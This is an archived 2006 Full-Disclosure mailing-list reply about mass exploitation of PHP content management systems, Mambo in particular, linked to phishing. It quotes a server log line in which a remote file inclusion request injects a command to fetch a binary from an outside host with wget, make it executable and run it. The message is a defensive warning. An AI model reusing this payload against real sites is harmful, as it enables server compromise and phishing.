| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.44.0603071558570.9817-100000@bugsbunny.castlecops.com> Date: Tue, 7 Mar 2006 16:01:26 -0500 (EST) From: Paul Laudanski <zx@...tlecops.com> To: Daniel Bonekeeper <thehazard@...il.com> Cc: vuln@...unia.com, bugs@...uritytracker.com, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, news@...uriteam.com Subject: Re: PHP-based CMS mass-exploitation On Tue, 7 Mar 2006, Daniel Bonekeeper wrote: > 83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET > /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo| > HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1;)" > > -- I know you mention Mambo, I've seen at least one Mambo site get exploited to running a phishing site. Mambo users need to upgrade to the latest greatest, or at the least Mambo needs to fix their code. We need to stop phishers taking advantage of what appears to be a Mambo weakness in its caching. -- Paul Laudanski, Microsoft MVP Windows-Security [de] http://de.castlecops.com [en] http://castlecops.com [wiki] http://wiki.castlecops.com [family] http://cuddlesnkisses.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists